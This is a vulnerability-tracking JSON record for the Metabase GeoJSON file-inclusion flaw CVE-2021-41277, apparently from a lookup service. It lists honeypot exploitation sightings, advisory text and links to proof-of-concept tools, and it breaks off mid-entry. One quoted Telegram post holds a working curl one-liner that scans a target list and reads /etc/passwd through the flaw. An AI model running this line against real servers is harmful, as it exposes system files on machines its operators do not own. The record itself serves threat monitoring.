{"vulnerability": "CVE-2021-41277", "sightings": [{"uuid": "f48cdd6d-9957-43a3-baa3-e00d2e085460", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2659502", "content": "", "creation_timestamp": "2024-11-12T19:24:15.536378Z"}, {"uuid": "648460d0-e21c-49b3-a13c-1ff9686919c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113471442114730989", "content": "", "creation_timestamp": "2024-11-12T18:40:00.715502Z"}, {"uuid": "113e484e-5113-420a-8da1-2fa890f1bc69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-11-12T21:10:02.000000Z"}, {"uuid": "ed8f4d4d-613e-4616-a8f0-5721b503337d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-30)", "content": "", "creation_timestamp": "2025-01-30T00:00:00.000000Z"}, {"uuid": "27055d37-8726-4dab-a509-13d8a50eb38e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-27)", "content": "", "creation_timestamp": "2025-01-27T00:00:00.000000Z"}, {"uuid": "5acf8f3b-eefc-4838-a27c-db226e6789fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-31)", "content": "", "creation_timestamp": "2025-01-31T00:00:00.000000Z"}, {"uuid": "bdb7eb78-3a4f-4291-a7bc-da19fd87b2a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-29)", "content": "", "creation_timestamp": "2025-01-29T00:00:00.000000Z"}, {"uuid": "f5c8b394-e7b7-42d2-9cd1-ca5fb7db1704", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-29)", "content": "", "creation_timestamp": "2025-01-29T00:00:00.000000Z"}, {"uuid": "af96c2ca-99b6-4270-8376-4ad9b522684f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-26)", "content": "", "creation_timestamp": "2025-01-26T00:00:00.000000Z"}, {"uuid": "9c795976-8fbf-41bb-98c3-a2cfbaad632b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-01)", "content": "", "creation_timestamp": "2025-02-01T00:00:00.000000Z"}, {"uuid": "7685a89f-a732-4624-9ce3-1b3c141a7785", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-28)", "content": "", "creation_timestamp": "2025-01-28T00:00:00.000000Z"}, {"uuid": "c29af405-16c7-4a3f-beb2-9b63fa2e9f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-01)", "content": "", "creation_timestamp": "2025-02-01T00:00:00.000000Z"}, {"uuid": "c26b5eac-3983-4509-8491-1d72cceb94d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-28)", "content": "", "creation_timestamp": "2025-01-28T00:00:00.000000Z"}, {"uuid": "9f3edd21-b560-48cb-b534-54e014b09fb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "542427aa-5329-412c-811c-aa17a0606fec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-09)", "content": "", "creation_timestamp": "2025-02-09T00:00:00.000000Z"}, {"uuid": "f22aecdd-9d3f-40f9-86fe-ed214b453f2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-05)", "content": "", "creation_timestamp": "2025-03-05T00:00:00.000000Z"}, {"uuid": "e67a73b2-7339-447a-a8e8-9071948b23a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-09)", "content": "", "creation_timestamp": "2025-03-09T00:00:00.000000Z"}, {"uuid": "dabcc3bc-30ae-4933-a44a-aca492d9dea1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-15)", "content": "", "creation_timestamp": "2025-02-15T00:00:00.000000Z"}, {"uuid": "32e0a312-9a4f-4a18-bc78-5fc02e9e52b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-09)", "content": "", "creation_timestamp": "2025-03-09T00:00:00.000000Z"}, {"uuid": "50a0c7df-7bc1-4907-a6dc-5ce7a4c2f272", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-15)", "content": "", "creation_timestamp": "2025-02-15T00:00:00.000000Z"}, {"uuid": "41f59f5e-edb0-4635-8af6-c4293d46690b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "87e3ac30-b4cf-4334-a38f-63219838d927", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:11:01.000000Z"}, {"uuid": "483b560b-f161-4cbf-ac31-6408d530f876", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-17)", "content": "", "creation_timestamp": "2025-06-17T00:00:00.000000Z"}, {"uuid": "3bc71f1d-3d0b-4174-a0f4-f79ee2ec6edb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-12)", "content": "", "creation_timestamp": "2025-04-12T00:00:00.000000Z"}, {"uuid": "c79e9ee1-45ff-433a-9f46-3bacc0b56e91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-01)", "content": "", "creation_timestamp": "2025-07-01T00:00:00.000000Z"}, {"uuid": "898fefb4-432c-42c7-ad6f-914f00317ef4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-20)", "content": "", "creation_timestamp": "2025-04-20T00:00:00.000000Z"}, {"uuid": "88c8c42f-5203-4025-a22f-729fd12fa68a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-24)", "content": "", "creation_timestamp": "2025-04-24T00:00:00.000000Z"}, {"uuid": "18272979-ca47-495c-aaeb-e3d94270c7be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-02)", "content": "", "creation_timestamp": "2025-06-02T00:00:00.000000Z"}, {"uuid": "472e8049-8e48-41ac-b1c7-4839e47d4a47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lordwbykcs25", "content": "", "creation_timestamp": "2025-05-09T21:15:54.053232Z"}, {"uuid": "89d4376a-2bfd-423b-b2e6-8821f5a07074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lordwdagok25", "content": "", "creation_timestamp": "2025-05-09T21:15:54.699739Z"}, {"uuid": "56f65479-6936-4d02-846b-68597fde863f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-18)", "content": "", "creation_timestamp": "2025-06-18T00:00:00.000000Z"}, {"uuid": "7394f466-4000-4860-b954-0335fece64c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-20)", "content": "", "creation_timestamp": "2025-07-20T00:00:00.000000Z"}, {"uuid": "83708d17-1081-4ef2-a48a-29a8ba474f43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-25)", "content": "", "creation_timestamp": "2025-07-25T00:00:00.000000Z"}, {"uuid": "b146a48f-09e4-46e0-9ae8-b50dd5eafcb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-01)", "content": "", "creation_timestamp": "2026-01-01T00:00:00.000000Z"}, {"uuid": "b2dfab2d-6fe6-4d59-b1bf-226687df846d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-06)", "content": "", "creation_timestamp": "2026-01-06T00:00:00.000000Z"}, {"uuid": "39742f19-2af3-4369-8e14-57dd7bf3051c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-22)", "content": "", "creation_timestamp": "2026-03-22T00:00:00.000000Z"}, {"uuid": "cdf4cee6-3932-470e-b73e-087843354304", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-11)", "content": "", "creation_timestamp": "2026-01-11T00:00:00.000000Z"}, {"uuid": "ce76bae9-c044-4ef8-a43f-0574c6f1254d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-12)", "content": "", "creation_timestamp": "2026-01-12T00:00:00.000000Z"}, {"uuid": "7c266bcb-366c-46c1-9f7b-3a3c24a2f954", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-26)", "content": "", "creation_timestamp": "2026-03-26T00:00:00.000000Z"}, {"uuid": "1c8cb074-27c5-4c68-96a8-78bac98f6fd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-22)", "content": "", "creation_timestamp": "2026-03-22T00:00:00.000000Z"}, {"uuid": "a6f5743f-bb5e-4b5d-91a8-440f6824f008", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-27)", "content": "", "creation_timestamp": "2026-03-27T00:00:00.000000Z"}, {"uuid": "35b9ed79-a537-48a7-b06b-43a045d6469a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-20)", "content": "", "creation_timestamp": "2026-03-20T00:00:00.000000Z"}, {"uuid": "f1b15841-bf25-4bf2-8c6c-114470dc28ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-21)", "content": "", "creation_timestamp": "2026-03-21T00:00:00.000000Z"}, {"uuid": "0c1211ed-f0bf-4e43-b034-bc487fe823ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/318678a8-3f9f-4940-843d-ef7f2ce5abc2", "content": "", "creation_timestamp": "2026-02-02T12:26:22.530201Z"}, {"uuid": "ff0f2e8f-2a52-4b16-97a7-31292d68006e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-02)", "content": "", "creation_timestamp": "2026-04-02T00:00:00.000000Z"}, {"uuid": "607c42e8-0d06-431a-b7f6-40548889e563", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-03)", "content": "", "creation_timestamp": "2026-04-03T00:00:00.000000Z"}, {"uuid": "36f66f5c-ff4b-4323-9a5c-2464eabf27e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/cKure/8206", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Zero-Day | CVE-2021-41277\n\ncat targets.txt | while read host do;do curl --silent --insecure --path-as-is \"$host/api/geojson?url=file:///etc/passwd\" | grep -qs \"root:x\" && echo \"$host \\033[0;31m Vulnerable\";done\n\nhttps://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr", "creation_timestamp": "2021-11-24T19:33:37.000000Z"}, {"uuid": "0a16a1d9-7a08-4423-b657-90e60e94ebbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-10)", "content": "", "creation_timestamp": "2026-04-10T00:00:00.000000Z"}, {"uuid": "fec8d615-02ec-4f54-9d9f-bcda3f36508b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-10)", "content": "", "creation_timestamp": "2026-04-10T00:00:00.000000Z"}, {"uuid": "49bb9f28-fb82-4f4e-94a0-5471adcd7c9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-11)", "content": "", "creation_timestamp": "2026-04-11T00:00:00.000000Z"}, {"uuid": "20ba10c4-afb3-4b14-a8ec-08889157d4ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-11)", "content": "", "creation_timestamp": "2026-04-11T00:00:00.000000Z"}, {"uuid": "960e34d3-10a9-4c5a-9744-413295875e36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-12)", "content": "", "creation_timestamp": "2026-04-12T00:00:00.000000Z"}, {"uuid": "2d79375b-85ff-480d-9d5c-3af474f255f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1364", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aIt is a nmap script for metabase vulnerability (CVE-2021-41277)\nURL\uff1ahttps://github.com/frknktlca/Metabase_Nmap_Script", "creation_timestamp": "2022-01-19T17:45:18.000000Z"}, {"uuid": "033e09eb-ed5f-43b3-a054-cb9e563e959e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1296", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41277 can be extended to an SSRF \nURL\uff1ahttps://github.com/sasukeourad/CVE-2021-41277_SSRF", "creation_timestamp": "2022-01-10T01:54:46.000000Z"}, {"uuid": "f970a88b-6ab6-4800-9e2a-822ac02df4db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/metabase_cve_2021_41277", "content": "", "creation_timestamp": "2021-12-01T07:22:50.000000Z"}, {"uuid": "4a736028-3a94-43b4-841c-776bdc6e4fb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-16)", "content": "", "creation_timestamp": "2026-04-16T00:00:00.000000Z"}, {"uuid": "1eb2528e-4892-4153-9763-94d503105677", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-20)", "content": "", "creation_timestamp": "2026-04-20T00:00:00.000000Z"}, {"uuid": "9380e19c-f5d0-4cd1-a611-28c90e7389b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-24)", "content": "", "creation_timestamp": "2026-04-24T00:00:00.000000Z"}, {"uuid": "dd7bc66b-aa06-48c0-881f-561857df4b18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/883", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPoC for CVE-2021-41277\nURL\uff1ahttps://github.com/tahtaciburak/CVE-2021-41277", "creation_timestamp": "2021-11-25T21:13:59.000000Z"}, {"uuid": "4cffa76b-02c3-4a23-a726-1c91427ec3dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/arpsyndicate/1564", "content": "#ExploitObserverAlert\n\nCVE-2021-41277\n\nDESCRIPTION: Exploit Observer has 50 entries related to CVE-2021-41277. Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you\u2019re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.\n\nFIRST-EPSS: 0.067680000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2023-12-08T13:01:21.000000Z"}, {"uuid": "c82171de-abb4-4a29-8e38-4997a00c2f0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/612", "content": "CVE-2021-41277 can be extended to an SSRF\nhttps://github.com/sasukeourad/CVE-2021-41277_SSRF\n\nSonicWall SMA-100 Unauth RCE \nExploit CVE-2021-20038\nhttps://github.com/jbaines-r7/badblood", "creation_timestamp": "2022-01-11T18:24:46.000000Z"}, {"uuid": "601f367d-8b62-4758-95f7-f9053ebbeafb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "Telegram/5u7FwDgfpeKuzG8ivHxniYFe1bK287W_1ULABUcApgjoyw", "content": "", "creation_timestamp": "2021-11-25T23:07:49.000000Z"}, {"uuid": "c68fdcae-5b4d-4c8c-b344-0c0455b06e30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "Telegram/5gxatJpYVM_NPaPWX745N9ibdK_MxDhjygYPpnblnfkz7g", "content": "", "creation_timestamp": "2021-11-23T22:40:00.000000Z"}, {"uuid": "c50d1a47-d8c7-4ce4-8e0f-0f3202ae03a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/cibsecurity/32567", "content": "\u203c CVE-2021-41277 \u203c\n\nMetabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you\u00c3\u00a2\u00e2\u201a\u00ac\u00e2\u201e\u00a2re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-17T22:20:55.000000Z"}, {"uuid": "cc71c2b6-7aa8-43cb-8951-d5f57e9db11d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1642", "content": "#CVE-2021\n\nIt is a nmap script for metabase vulnerability (CVE-2021-41277)\n\nhttps://github.com/frknktlca/Metabase_Nmap_Script\n\n@BlueRedTeam", "creation_timestamp": "2022-01-19T18:55:18.000000Z"}, {"uuid": "2d2b51fb-c371-40db-99c4-b18bb59a5586", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4802", "content": "#exploit\nCVE-2021-41277:\nMetaBase Arbitrary File Read\nhttps://github.com/0x0021h/expbox/blob/main/CVE-2021-41277.yaml", "creation_timestamp": "2021-11-21T13:45:01.000000Z"}, {"uuid": "ad5a6427-0605-4c1c-bb7c-d8e60321dece", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/4889", "content": "#Analytics\nTop 10 Most Used Vulns of the Month 